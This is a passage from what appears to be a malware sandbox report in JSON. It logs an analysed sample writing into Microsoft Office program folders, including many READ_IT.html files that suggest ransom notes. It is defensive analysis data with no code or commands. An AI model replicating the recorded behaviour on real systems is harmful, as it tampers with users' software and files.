System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17896", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\ocrvc.dat\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OEMPRINT.CAT", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\oemprint.cat", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17907", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\oemprint.cat\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OLKIRM.XML", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\olkirm.xml", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17924", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\olkirm.xml\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OLKIRMV.XML", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\olkirmv.xml", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17939", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\olkirmv.xml\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OMML2MML.XSL", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\omml2mml.xsl", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17955", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\omml2mml.xsl\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\ONENOTEIRM.XML", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\onenoteirm.xml", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17980", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\onenoteirm.xml\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\ORMMODEL.MDL", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\ormmodel.mdl", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_18006", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\ormmodel.mdl\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OSPP.HTM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\ospp.htm", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_18021", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\ospp.htm\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OUTLFLTR.DAT", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\outlfltr.dat", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_18031", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\outlfltr.dat\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\visio content\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_18425", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\visio content\\1033\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\samples\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_20511", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\samples\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\queries\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_20517", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\queries\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\pubwiz\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_20531", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\pubwiz\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\pubba\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_21469", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\pubba\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\proof\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_21531", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\proof\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\pagesize\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_21605", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\pagesize\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_21895", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\outlookautodiscover\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\onenote\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22073", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\onenote\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\media\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22097", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\media\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Library\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\library\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22175", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\library\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\library\\solver\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22181", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\library\\solver\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\library\\analysis\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22188", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\library\\analysis\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\infopathom\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22207", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\infopathom\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomv12\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22214", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\infopathom\\infopathomv12\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22221", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\infopathomformservicesv12\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22228", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\infopathomformservicesv12\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\xml files\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22234", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\xml files\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22260", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolicons\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\welcome tool\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22390", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\welcome tool\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22400", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\fancy\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22487", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\fancy\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\basic\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22505", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\basic\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_22511", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": 